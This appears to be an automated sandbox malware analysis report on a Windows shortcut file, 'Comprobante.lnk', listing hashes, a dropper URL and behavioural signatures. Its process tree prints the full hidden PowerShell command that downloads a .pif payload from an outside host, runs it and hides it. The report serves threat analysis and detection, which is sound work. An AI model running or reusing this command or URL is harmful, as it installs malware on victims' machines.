Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 07:14
Static task
static1
Behavioral task
behavioral1
Sample
Comprobante.lnk
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Comprobante.lnk
-
Size
2KB
-
MD5
8c19af87f9129a49e35158f93815eb7f
-
SHA1
9a6c4b22c2e5bf7f039eb2ad20d0822c0e913d14
-
SHA256
245f1f3463841248c78c4917dc1a846419f92d957132fabf0b4ee4501dcb6198
-
SHA512
829aa9dea154d1ac2493bee30b32fc518f0c6a595b806aefd13652591424acf885135da1eafbb1641a40fa6d84761229ea54c45bfefa7bf3f300461043f558df
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
PoWeRShElL.exepid Process 1208 PoWeRShElL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PoWeRShElL.exedescription pid Process Token: SeDebugPrivilege 1208 PoWeRShElL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2868 wrote to memory of 1208 2868 cmd.exe 29 PID 2868 wrote to memory of 1208 2868 cmd.exe 29 PID 2868 wrote to memory of 1208 2868 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Comprobante.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-